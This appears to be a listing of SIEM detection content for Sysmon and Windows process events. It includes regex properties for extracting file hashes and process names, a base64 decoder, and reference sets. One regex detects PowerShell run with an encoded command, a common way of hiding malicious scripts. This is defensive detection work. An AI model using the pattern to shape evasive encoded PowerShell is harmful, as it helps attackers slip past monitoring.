Custom Property | PS Encoded Command | Process Command Line:\s*powershell.*[\-^]{1,2}[Ee^]{1,2}[NnCcOoDdEeMmAa^]*[\s^]+(\S+)\s*Token Elevation Type |
Custom Property | ImageName | New Process Name:\s*(?:.*\\)(\S*)\s*Token\sElevation\sType\: |
Custom Property | SHA1 Hash | SHA1=(\w+) |
Custom Property | MD5 Hash | MD5=(\w*) |
Custom Property | SHA256 Hash | SHA256=(\w*) |
Custom Property | IMP Hash | IMPHASH=(\w*) |
Custom Property | Image | New Process Name:\s*(\S*)\s*Token\sElevation\sType\: |
Custom Function | base64Decode | Decodes the base64 text from the PowerShell encoded command into a normal readable string. |
Custom Function | PScmdFilter | Filters the process command line from the Sysmon events. |
Saved Search | Very Long Command Line Detected | This is an event search to match on long process command lines from Sysmon events. |
Reference Set | TempFilePath | Contains a list of file paths of the temporary directory. |
Reference Set | Windows Sensitive Processes | Contains a list of all Windows-sensitive processes. |
Reference Set | ProcessMaptoProcessPath | Contains a list of process names and the paths to those processes. |
Reference Set | ProcessMaptoProcessParentPath | Contains a list of process names and the paths to the parent processes. |